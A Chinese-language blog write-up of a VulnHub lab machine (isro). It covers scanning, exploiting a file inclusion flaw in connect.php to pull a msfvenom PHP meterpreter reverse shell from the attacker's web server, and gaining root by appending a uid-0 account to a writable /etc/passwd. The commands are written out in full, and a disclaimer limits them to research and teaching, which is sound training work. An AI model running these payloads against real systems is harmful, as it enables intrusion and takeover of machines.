vulnhub之isro的实践

admin 2020年9月13日17:01:54评论283 views字数 1034阅读3分26秒阅读模式

本周实践的是vulnhub的isro镜像,下载地址,https://download.vulnhub.com/ha/isro.zip,

首先做地址扫描,sudo netdiscover -r 192.168.137.0/24,

vulnhub之isro的实践

接着做端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.80,

vulnhub之isro的实践

再来个目录文件爆破,sudo dirb http://192.168.137.80 -X .php,.txt,.zip,.html,

vulnhub之isro的实践

这个地方直接猜测http://192.168.137.80/connect.php有文件包含漏洞,一试还真有,案理说不该这么直接猜的,应该拿web漏洞扫描器扫出来,

vulnhub之isro的实践

不管这么多了,总之就是要利用这个漏洞,

在kali攻击机上做一个反弹shell脚本,

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.137.194 LPORT=4444 R > shell.php,

在kali攻击机上开启web文件下载服务,python -m SimpleHTTPServer,

在kali攻击机上开一个meterpretershell监听,

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.137.194
exploit

这就可以通过访问http://192.168.137.80/connect.php?file=http://192.168.137.194:8000/shell.php来制造反弹shell,

拿到meterpreter反弹shell后getuid查看,不是root,还需要继续提权,

vulnhub之isro的实践

先转成交互式的shell,

shell,python3 -c 'import pty;pty.spawn("/bin/bash")',

查看/etc/passwd,ls -la /etc/passwd,发现当前账户可写,

那就有招了,可以制作一个账户密码填进去,hacker/password,

制作密码,perl -le 'print crypt("password","salt")',

填到/etc/passwd里,echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,

再切换账户,su hacker,再id查看,获取root权限完成,

vulnhub之isro的实践


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月13日17:01:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之isro的实践http://cn-sec.com/archives/130909.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息